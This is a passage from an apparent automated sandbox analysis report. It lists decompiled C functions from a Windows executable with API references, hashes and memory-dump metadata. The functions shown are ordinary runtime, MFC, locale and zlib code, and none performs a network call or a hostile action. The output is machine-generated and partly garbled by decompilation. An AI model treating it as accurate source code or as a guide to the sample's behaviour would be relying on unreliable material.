0x0040ab1d
0x0040ab3e
0x0040ab53
0x0040ab53
0x0040ab44
0x0040ab4b
0x0040ab4b
0x0040ab55
0x0040ab56
0x0040ab56
0x0040ab63

APIs

_strcpy_s.LIBCMT ref: 0040AAC4

Part of subcall function 00427761: __getptd_noexit.LIBCMT ref: 00427761

__snprintf_s.LIBCMT ref: 0040AAFD

Part of subcall function 00427707: __vsnprintf_s_l.LIBCMT ref: 0042771C

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 0040AB28
LoadLibraryA.KERNEL32(?), ref: 0040AB4B

Strings

LOC, xrefs: 0040AABC

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 3864805678-519433814
Opcode ID: 8fa1582c11f506927266436f534c215d7bffaaac389cf0636dbdd853f6187fc6
Instruction ID: 97373838361aac7f2ca4ef494d66bff28cc33be9144ac9d97075a17fbeeb0580
Opcode Fuzzy Hash: 8fa1582c11f506927266436f534c215d7bffaaac389cf0636dbdd853f6187fc6
Instruction Fuzzy Hash: D511E771A00318ABDB11BB71EC46BEA33A89F01318F5040B7B205A71D1DA78AD558B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0042569C, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0042569C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x44f5d0; // 0x765b253d
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x452c10 = _t6;
				 *0x452c0c = _t22;
				 *0x452c08 = _t25;
				 *0x452c04 = _t21;
				 *0x452c00 = _t27;
				 *0x452bfc = _t26;
				 *0x452c28 = ss;
				 *0x452c1c = cs;
				 *0x452bf8 = ds;
				 *0x452bf4 = es;
				 *0x452bf0 = fs;
				 *0x452bec = gs;
				asm("pushfd");
				_pop( *0x452c20);
				 *0x452c14 =  *_t31;
				 *0x452c18 = _v0;
				 *0x452c24 =  &_a4;
				 *0x452b60 = 0x10001;
				_t11 =  *0x452c18; // 0x0
				 *0x452b14 = _t11;
				 *0x452b08 = 0xc0000409;
				 *0x452b0c = 1;
				_t12 =  *0x44f5d0; // 0x765b253d
				_v812 = _t12;
				_t13 =  *0x44f5d4; // 0x89a4dac2
				_v808 = _t13;
				 *0x452b58 = IsDebuggerPresent();
				_push(1);
				E0042D655(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x440428);
				if( *0x452b58 == 0) {
					_push(1);
					E0042D655(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0042569c
0x0042569c
0x0042569c
0x0042569c
0x0042569c
0x0042569c
0x0042569c
0x004256a2
0x004256a4
0x004256a4
0x0042a6c3
0x0042a6c8
0x0042a6ce
0x0042a6d4
0x0042a6da
0x0042a6e0
0x0042a6e6
0x0042a6ed
0x0042a6f4
0x0042a6fb
0x0042a702
0x0042a709
0x0042a710
0x0042a711
0x0042a71a
0x0042a722
0x0042a72a
0x0042a735
0x0042a73f
0x0042a744
0x0042a749
0x0042a753
0x0042a75d
0x0042a762
0x0042a768
0x0042a76d
0x0042a779
0x0042a77e
0x0042a780
0x0042a788
0x0042a793
0x0042a7a0
0x0042a7a2
0x0042a7a4
0x0042a7a9
0x0042a7bd

APIs

IsDebuggerPresent.KERNEL32 ref: 0042A773
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042A788
UnhandledExceptionFilter.KERNEL32(00440428), ref: 0042A793
GetCurrentProcess.KERNEL32(C0000409), ref: 0042A7AF
TerminateProcess.KERNEL32(00000000), ref: 0042A7B6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0778dea2f54661dffa96035823a163872ef307f4df011572cb3a2b82417b0020
Instruction ID: d0ee815df1bb176ac324e86511d928fbba5ee03cc37b3d7547be9391c41284d7
Opcode Fuzzy Hash: 0778dea2f54661dffa96035823a163872ef307f4df011572cb3a2b82417b0020
Instruction Fuzzy Hash: 9321C0B89013049FD706DF28FA456083BB4BB1A306F50943BE50997263EBB4A981CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041123F, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041123F(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E00415985(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00410D9E(_t15, _t15, _t18, _t19, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E0040A3FC();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x00411242
0x0041124e
0x00411296
0x00411298
0x0041129f
0x00000000
0x004112a1
0x00411255
0x00411259
0x00000000
0x00000000
0x0041125b
0x00411268
0x00000000
0x0041127c
0x0041128b
0x00000000
0x00411293

APIs

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

GetKeyState.USER32(00000010), ref: 00411263
GetKeyState.USER32(00000011), ref: 0041126C
GetKeyState.USER32(00000012), ref: 00411275
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041128B

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 900ce60a4c45a6b21401fbc6a052ba24f4b52ebcfcb03bdfa010210fbc577c22
Instruction ID: 7e7f712ea3b14e37511a4367657ab5097a8e93718f9a09bb3d4d8c6a0ab0ced3
Opcode Fuzzy Hash: 900ce60a4c45a6b21401fbc6a052ba24f4b52ebcfcb03bdfa010210fbc577c22
Instruction Fuzzy Hash: A6F0E976B9039E26E53037B96C01FFA52944F85BD9F01057AA701FA1F1C9B888C19179

Uniqueness

Uniqueness Score: -1.00%

Function 00414D65, Relevance: 4.6, APIs: 3, Instructions: 125
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00414D65(intOrPtr __ebx, signed int __edx) {
				void* __edi;
				void* __esi;
				signed int _t46;
				intOrPtr _t49;
				signed int _t51;
				void* _t53;
				signed int* _t76;
				signed int* _t79;
				signed int* _t82;
				signed int* _t85;
				signed int _t96;
				CHAR* _t98;
				intOrPtr _t99;
				signed int* _t102;
				intOrPtr _t103;
				signed int _t104;
				void* _t106;

				_t96 = __edx;
				_t84 = __ebx;
				_t104 = _t106 - 0xcc;
				_t46 =  *0x44f5d0; // 0x765b253d
				 *(_t104 + 0xc8) = _t46 ^ _t104;
				_t102 =  *(_t104 + 0xd8);
				_t98 =  *(_t104 + 0xd4);
				if(_t98 != 0) {
					if(lstrlenA(_t98) >= 0x104) {
						goto L1;
					} else {
						_push(__ebx);
						_t85 =  &(_t102[8]);
						_t51 = E0042140D(_t85, _t98);
						if(_t51 != 0) {
							_t53 = FindFirstFileA(_t98, _t104 - 0x78);
							_t100 = _t98 | 0xffffffff;
							if(_t53 != (_t98 | 0xffffffff)) {
								FindClose(_t53);
								_t102[8] =  *(_t104 - 0x78) & 0x0000007f;
								asm("cdq");
								_t102[6] =  *(_t104 - 0x58);
								_t102[7] = _t96;
								if(E00414BED(_t104 - 0x74) == 0) {
									 *_t102 =  *_t102 & 0x00000000;
									_t102[1] = _t102[1] & 0x00000000;
								} else {
									_t82 = L00414D07(_t85, _t104 - 0x80, _t104 - 0x74, _t100);
									 *_t102 =  *_t82;
									_t102[1] = _t82[1];
								}
								if(E00414BED(_t104 - 0x6c) == 0) {
									_t102[4] = 0;
									_t102[5] = 0;
								} else {
									_t79 = L00414D07(_t85, _t104 - 0x80, _t104 - 0x6c, _t100);
									_t102[4] =  *_t79;
									_t102[5] = _t79[1];
								}
								if(E00414BED(_t104 - 0x64) == 0) {
									_t102[2] = 0;
									_t102[3] = 0;
								} else {
									_t76 = L00414D07(_t85, _t104 - 0x80, _t104 - 0x64, _t100);
									_t102[2] =  *_t76;
									_t102[3] = _t76[1];
								}
								if(( *_t102 | _t102[1]) == 0) {
									 *_t102 = _t102[2];
									_t102[1] = _t102[3];
								}
								if((_t102[4] | _t102[5]) == 0) {
									_t102[4] = _t102[2];
									_t102[5] = _t102[3];
								}
								_t49 = 1;
							} else {
								goto L6;
							}
						} else {
							 *_t85 = _t51;
							L6:
							_t49 = 0;
						}
						_pop(_t84);
					}
				} else {
					L1:
					_t49 = 0;
				}
				_pop(_t99);
				_pop(_t103);
				return E0042569C(_t49, _t84,  *(_t104 + 0xc8) ^ _t104, _t96, _t99, _t103);
			}

0x00414d65
0x00414d65
0x00414d66
0x00414d73
0x00414d7a
0x00414d81
0x00414d88
0x00414d90
0x00414da5
0x00000000
0x00414da7
0x00414da7
0x00414da9
0x00414dad
0x00414db4
0x00414dbf
0x00414dc5
0x00414dca
0x00414dd4
0x00414ddf
0x00414de5
0x00414de6
0x00414ded
0x00414df7
0x00414e12
0x00414e15
0x00414df9
0x00414e01
0x00414e08
0x00414e0d
0x00414e0d
0x00414e24
0x00414e44
0x00414e47
0x00414e26
0x00414e2e
0x00414e35
0x00414e3b
0x00414e3b
0x00414e55
0x00414e75
0x00414e78
0x00414e57
0x00414e5f
0x00414e66
0x00414e6c
0x00414e6c
0x00414e80
0x00414e85
0x00414e8a
0x00414e8a
0x00414e93
0x00414e98
0x00414e9e
0x00414e9e
0x00414ea3
0x00000000
0x00000000
0x00000000
0x00414db6
0x00414db6
0x00414dcc
0x00414dcc
0x00414dcc
0x00414ea4
0x00414ea4
0x00414d92
0x00414d92
0x00414d92
0x00414d92
0x00414eab
0x00414eae
0x00414ebb

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 00414D9A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 39dfebdecb1ade21d3e15f3a984c0088e8b16aef97318a65829362d95b460b59
Instruction ID: 33f7819512f5dd9e305acd2cfeabe0ecfee79e827ae70f2d142499dc56f1ac78
Opcode Fuzzy Hash: 39dfebdecb1ade21d3e15f3a984c0088e8b16aef97318a65829362d95b460b59
Instruction Fuzzy Hash: 87414C715007058FDB20DF69E880ADBB7F8FF88314B10892EE49AD7650EB34E944CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004392ED, Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004392ED() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x44f5d0; // 0x765b253d
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E0042569C(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x004392f3
0x004392fa
0x004392fe
0x0043931a
0x0043933b
0x00439341
0x0043931c
0x0043931c
0x00439321
0x00439324
0x00000000
0x00439326
0x00439326
0x0043932c
0x0043932d
0x00439331
0x00439333
0x00439339
0x00000000
0x00000000
0x00439339
0x00439324
0x00439351

APIs

GetThreadLocale.KERNEL32 ref: 00439300
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 00439312
GetACP.KERNEL32 ref: 0043933B

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 543995075a33aa748368cc5761d885a329cdb61fa283df0b0a4cd9bafe5ea935
Instruction ID: 82755941bdf595e345b41047a09be42b11bcaadaf5c300ff107eb07875594739
Opcode Fuzzy Hash: 543995075a33aa748368cc5761d885a329cdb61fa283df0b0a4cd9bafe5ea935
Instruction Fuzzy Hash: 79F02871E006289BD7109B70A9556EF77B4AF08B00F4050AADC41E7280DA74AD0587C8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA73, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040EA73(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E0040E932() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E0040EA27( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x4524cc(_a4, _a8);
			}

0x0040ea80
0x0040ea94
0x0040eaa8
0x0040eac0
0x0040eaaa
0x0040eab1
0x0040eab1
0x0040eac8
0x00000000
0x0040eaca
0x00000000
0x0040ead1
0x0040eac8
0x00000000
0x0040ea96
0x00000000

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b8b0513beee8ee9860d18fc605f567ac3608eb2a5e21905df4736551acadd5
Instruction ID: 36ea2d51463adb54b67d457fe1a9d3950062950f5d8594cb6e948898bd4d79c6
Opcode Fuzzy Hash: d6b8b0513beee8ee9860d18fc605f567ac3608eb2a5e21905df4736551acadd5
Instruction Fuzzy Hash: 0FF03131604109AACF019FA7DC049AE7FA9FB08345B048836F916B51A1D778DA259F59

Uniqueness

Uniqueness Score: -1.00%

Function 0043211C, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0043211C(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E0042A82A());
				 *0x4534fc = 0;
				return _t8;
			}

0x00432121
0x00432131
0x00432137
0x0043213e

APIs

__decode_pointer.LIBCMT ref: 0043212A

Part of subcall function 0042A82A: TlsGetValue.KERNEL32(00000000,0042ED62,00426543,?,?,0040A3E6,?,?,00000000,00415543,0000000C,00000004,00401D16,000000FF,0040568B,80070057), ref: 0042A837
Part of subcall function 0042A82A: TlsGetValue.KERNEL32(00000006,?,0040A3E6,?,?,00000000,00415543,0000000C,00000004,00401D16,000000FF,0040568B,80070057,=%[v,00417183,?), ref: 0042A84E

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00432131

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: bb7e26f6acd0e0361c23bd7a8c87c8855090e538eba5149cbc3c0a6313f09455
Instruction ID: 52c4434c388a89cf671d9492e192ffce14a2bd6db36bf990a7e7416d6f674dea
Opcode Fuzzy Hash: bb7e26f6acd0e0361c23bd7a8c87c8855090e538eba5149cbc3c0a6313f09455
Instruction Fuzzy Hash: 55C080108242C04BD3035B34780E31479009703247F4894BBFC0084243D97CD54C463D

Uniqueness

Uniqueness Score: -1.00%

Function 004078F0, Relevance: 2.8, Strings: 2, Instructions: 287
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E004078F0(signed char** __eax, void* __ecx) {
				signed char _v8;
				signed int* _t119;
				signed int _t120;
				void* _t154;
				signed char** _t184;

				_t184 = __eax;
				if(__eax == 0) {
					L34:
					return 0xfffffffe;
				} else {
					_t119 =  *(__eax + 0x1c);
					if(_t119 != 0 &&  *((intOrPtr*)(__eax)) != 0) {
						_t120 =  *_t119;
						_t154 = 0xfffffffb;
						while(_t120 <= 0xd) {
							switch( *((intOrPtr*)(_t120 * 4 +  &M00407C80))) {
								case 0:
									_t121 = _t184[1];
									if(_t121 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t184[1] =  &(_t121[0xffffffffffffffff]);
										_t184[7][4] =  *( *_t184) & 0x000000ff;
										_t125 = _t184[7];
										 *_t184 =  &(( *_t184)[1]);
										_t154 = 0;
										if((_t125[4] & 0x0000000f) == 8) {
											if((_t125[4] >> 4) + 8 <= _t125[0x10]) {
												 *_t125 = 1;
												goto L11;
											} else {
												 *_t125 = 0xd;
												_t184[6] = "invalid window size";
												goto L32;
											}
										} else {
											 *_t125 = 0xd;
											_t184[6] = "unknown compression method";
											goto L32;
										}
									}
									goto L50;
								case 1:
									L11:
									_t126 = _t184[1];
									if(_t126 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t191 = _t184[7];
										_t184[1] =  &(_t126[0xffffffffffffffff]);
										_t128 =  *_t184;
										_t164 =  *_t128 & 0x000000ff;
										 *_t184 =  &(_t128[1]);
										_v8 = _t164;
										_t154 = 0;
										if(((_t191[4] << 8) + _t164) % 0x1f == 0) {
											if((_v8 & 0x00000020) != 0) {
												 *(_t184[7]) = 2;
												goto L38;
											} else {
												 *_t191 = 7;
												goto L33;
											}
										} else {
											 *_t191 = 0xd;
											_t184[6] = "incorrect header check";
											goto L32;
										}
									}
									goto L50;
								case 2:
									L38:
									_t134 = _t184[1];
									if(_t134 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t184[1] =  &(_t134[0xffffffffffffffff]);
										_t184[7][8] = ( *( *_t184) & 0x000000ff) << 0x18;
										_t154 = 0;
										 *_t184 =  &(( *_t184)[1]);
										 *(_t184[7]) = 3;
										goto L40;
									}
									goto L50;
								case 3:
									L40:
									_t138 = _t184[1];
									if(_t138 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t184[1] =  &(_t138[0xffffffffffffffff]);
										_t184[7][8] = _t184[7][8] + (( *( *_t184) & 0x000000ff) << 0x10);
										_t154 = 0;
										 *_t184 =  &(( *_t184)[1]);
										 *(_t184[7]) = 4;
										goto L42;
									}
									goto L50;
								case 4:
									L42:
									_t142 = _t184[1];
									if(_t142 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t184[1] =  &(_t142[0xffffffffffffffff]);
										_t184[7][8] = _t184[7][8] + (( *( *_t184) & 0x000000ff) << 8);
										_t154 = 0;
										 *_t184 =  &(( *_t184)[1]);
										 *(_t184[7]) = 5;
										goto L44;
									}
									goto L50;
								case 5:
									L44:
									_t146 = _t184[1];
									if(_t146 == 0) {
										goto L36;
									} else {
										_t184[2] =  &(_t184[2][1]);
										_t184[1] =  &(_t146[0xffffffffffffffff]);
										_t184[7][8] = _t184[7][8] + ( *( *_t184) & 0x000000ff);
										_t149 = _t184[7];
										 *_t184 =  &(( *_t184)[1]);
										_t184[0xc] = _t149[8];
										 *_t149 = 6;
										return 2;
									}
									goto L50;
								case 6:
									 *(__edi[7]) = 0xd;
									__eax = __edi[7];
									__edi[6] = "need dictionary";
									 *((intOrPtr*)(__edi[7] + 4)) = 0;
									__eax = 0xfffffffe;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 0xfffffffe;
									goto L50;
								case 7:
									__ecx = __edi[7];
									__ecx =  *(__edi[7] + 0x14);
									_push(__ebx);
									__eax = __edi;
									__ebx = E00405F80(__edi,  *(__edi[7] + 0x14));
									__esp = __esp + 4;
									if(__ebx != 0xfffffffd) {
										if(__ebx == 0) {
											__ebx = 0;
											goto L36;
										} else {
											if(__ebx != 1) {
												goto L36;
											} else {
												__ecx = __edi[7];
												__esi =  *((intOrPtr*)(__ecx + 0x14));
												__eax = __ecx + 4;
												__ebx = 0;
												__eax = E00405E70(__ecx + 4, __edi,  *((intOrPtr*)(__ecx + 0x14)));
												__eax = __edi[7];
												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
													 *__eax = 8;
													goto L23;
												} else {
													 *__eax = 0xc;
													goto L33;
												}
											}
										}
									} else {
										 *(__edi[7]) = 0xd;
										__eax = __edi[7];
										 *((intOrPtr*)(__edi[7] + 4)) = 0;
										goto L33;
									}
									goto L50;
								case 8:
									L23:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) = ( *( *__edi) & 0x000000ff) << 0x18;
										__ecx = __edi[7];
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 9;
										goto L25;
									}
									goto L50;
								case 9:
									L25:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__ecx =  *( *__edi) & 0x000000ff;
										__eax = __edi[7];
										__ecx = ( *( *__edi) & 0x000000ff) << 0x10;
										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 0x10);
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 0xa;
										goto L27;
									}
									goto L50;
								case 0xa:
									L27:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 8);
										__eax = __edi[7];
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 0xb;
										goto L29;
									}
									goto L50;
								case 0xb:
									L29:
									__eax = __edi[1];
									if(__eax == 0) {
										L36:
										return _t154;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) =  *(__edi[7] + 8) + ( *( *__edi) & 0x000000ff);
										__eax = __edi[7];
										 *__edi =  *__edi + 1;
										__ecx =  *(__eax + 4);
										__ebx = 0;
										if( *(__eax + 4) ==  *((intOrPtr*)(__eax + 8))) {
											__ecx = __edi[7];
											 *(__edi[7]) = 0xc;
											goto L48;
										} else {
											 *__eax = 0xd;
											__edi[6] = "incorrect data check";
											L32:
											_t184[7][1] = 5;
											goto L33;
										}
									}
									goto L50;
								case 0xc:
									L48:
									__eax = 1;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 1;
									goto L50;
								case 0xd:
									_pop(__edi);
									_pop(__esi);
									__eax = 0xfffffffd;
									_pop(__ebx);
									return 0xfffffffd;
									goto L50;
							}
							L33:
							_t120 =  *(_t184[7]);
						}
					}
					goto L34;
				}
				L50:
			}

0x004078fa
0x004078fe
0x00407b51
0x00407b5c
0x00407904
0x00407904
0x00407909
0x00407918
0x0040791d
0x00407922
0x00407928
0x00000000
0x0040792f
0x00407934
0x00000000
0x0040793a
0x0040793a
0x00407944
0x0040794c
0x0040794f
0x00407955
0x0040795b
0x00407960
0x00407980
0x00407994
0x00000000
0x00407982
0x00407982
0x00407988
0x00000000
0x00407988
0x00407962
0x00407962
0x00407968
0x00000000
0x00407968
0x00407960
0x00000000
0x00000000
0x0040799a
0x0040799a
0x0040799f
0x00000000
0x004079a5
0x004079a5
0x004079a9
0x004079af
0x004079b2
0x004079b4
0x004079ba
0x004079c4
0x004079d1
0x004079d5
0x004079ee
0x00407b6b
0x00000000
0x004079f4
0x004079f4
0x00000000
0x004079f4
0x004079d7
0x004079d7
0x004079dd
0x00000000
0x004079dd
0x004079d5
0x00000000
0x00000000
0x00407b71
0x00407b71
0x00407b76
0x00000000
0x00407b78
0x00407b7a
0x00407b84
0x00407b8d
0x00407b93
0x00407b95
0x00407b98
0x00000000
0x00407b98
0x00000000
0x00000000
0x00407b9e
0x00407b9e
0x00407ba3
0x00000000
0x00407ba5
0x00407ba7
0x00407bae
0x00407bba
0x00407bc0
0x00407bc2
0x00407bc5
0x00000000
0x00407bc5
0x00000000
0x00000000
0x00407bcb
0x00407bcb
0x00407bd0
0x00000000
0x00407bd2
0x00407bd4
0x00407bdb
0x00407be7
0x00407bed
0x00407bef
0x00407bf2
0x00000000
0x00407bf2
0x00000000
0x00000000
0x00407bf8
0x00407bf8
0x00407bfd
